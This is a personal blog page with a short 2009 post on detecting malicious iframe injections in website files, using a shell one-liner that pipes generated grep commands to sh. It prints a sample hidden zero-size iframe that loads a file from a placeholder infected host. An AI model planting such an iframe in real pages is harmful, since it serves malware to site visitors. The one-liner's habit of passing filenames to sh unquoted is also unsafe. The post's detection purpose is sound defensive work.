Mindbend.org

Mindblog

Welcome to my Blog!

Techblog

Information should be free, accurate, and available. I will be updating this section most often, enjoy!

Portfolio

Various galleries of artwork and photography I have done over the last five years.

Scripts

Mini scripts I have written and decided to share. Mostly oneliners for managing network and system load.

Mindware

Software projects are in the works and will be here eventually!

Contact

You can contact me through various methods.

Parsing Webfiles for Infections

Lets face it, there are is lot of virii going around these days. No longer are the days of mass .exe emailing ( though they still go around ). Now you have websites being hijacked and used as malcious carriers of the virus.

Finding the infection

The scripts here only detect possible infections, this needs to be a hand on fix to ensure you don't break anything. It is also worth mentioning that iframes do have legit reasons for existance and are used frequently in the industry. Just because this detects a file with an iframe does not mean it is infected. This script does a search through the website for all 'files' that are not in the second list 'not binaries' and looks inside for iframes.

find . -type f | egrep -iv '(..png|..jpg|_binary files_|..gif)' | awk \
 '{ print "grep -li iframe " $1 }'|sh

The result will be a list of files containing iframes.

index.html
services.html
bloglinks.html
site.js

$cat index.html | grep iframe
<iframe src=http://infected.domain.tld/badfile.htm width=0 height=0></iframe>

This is a simple example, most are much uglier and encode their functions. For cleaning solutions, it depends on the type of strain. Most of the strains will require individual cleaning solutions that scripts cannot provide.

Parsing Webfiles for Infections
Apache Log Parsers
Written by:Robert Church
Published on:06-06-2009
Quick Byte

Cole's Law: Thinly sliced cabbage.